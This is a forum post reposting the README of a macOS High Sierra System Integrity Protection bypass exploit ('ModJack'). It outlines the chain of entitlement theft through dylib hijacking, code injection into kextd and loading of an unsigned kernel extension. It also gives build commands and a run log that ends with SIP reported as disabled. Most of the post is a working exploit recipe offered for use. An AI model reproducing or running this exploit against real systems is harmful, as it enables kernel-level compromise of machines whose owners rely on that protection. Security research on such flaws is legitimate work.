Jump to content
Nytro

macOS 10.13.x SIP bypass (kernel privilege escalation)

Recommended Posts

macOS 10.13.x SIP bypass (kernel privilege escalation)

Works only on High Sierra, and requires root privilege. It can be chained with my previous local root exploits.

Slides

https://conference.hitb.org/hitbsecconf2019ams/materials/D2T2%20-%20ModJack%20-%20Hijacking%20the%20MacOS%20Kernel%20-%20Zhi%20Zhou.pdf

  • symbols has com.apple.system-task-ports entitlement thus it can get the task port of kextd via task_for_pid (requires root because kextd has euid 0)
  • Trigger dylib hijack to load evil payload in process symbols and steal the entitlement and control kextd
  • kextd / kextutil / kextload are com.apple.rootless.kext-secure-management entitled, with whom the they can send MKext request to XNU to load KEXT
  • All the validation are checked in userland: code signature, root filesystem permission, User-Approved Kernel Extension Loading, KEXT staging. Just ask XNU to load our KEXT without code signature

Build

First, grab the dependencies

git submodule init
git submodule update

Install binutils

brew install binutils

Build Unrootless.kext

pushd 3rd-party/Unrootless-Kext ; xcodebuild ; popd

Build kernel exploit

pushd libinj ; make ; popd; pushd kernel ; make ; popd

Run

$ sudo ./kernel/bin/exp
Password:
2019-05-13 01:11:14.826 exp[666:7308] [LightYear] taytay pid: 668
2019-05-13 01:11:14.828 exp[666:7308] [LightYear] status: 0, pid 669
2019-05-13 01:11:14.892 symbols[669:7313] [LightYear] I am in symbols
2019-05-13 01:11:14.895 symbols[669:7313] [LightYear] inject /Users/test/Downloads/1/kernel/bin/Toolchains/XcodeDefault.xctoolchain/> usr/lib/libswiftDemangle.dylib to kextd
get task port (OK)
allocate stack (OK)
remote stack 0x10714d000
allocate code (OK)
remote code 0x1041e7000
write loader code (OK)
mark code as eXecutable (OK)
mark stack as RW (OK)
write params (OK)
create remote thread (OK)
So it's gonna be forever

Then try to load any unsigned KEXT

$ csrutil status
System Integrity Protection status: enabled.
$ codesign -dvvv "./3rd-party/Unrootless-Kext/build/Release/Unrootless.kext"
./3rd-party/Unrootless-Kext/build/Release/Unrootless.kext: code object is not signed at all
$ sudo kextload 3rd-party/Unrootless-Kext/build/Release/Unrootless.kext
$ csrutil status
System Integrity Protection status: disabled.

 

Sursa: https://github.com/ChiChou/sploits/tree/master/ModJack

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...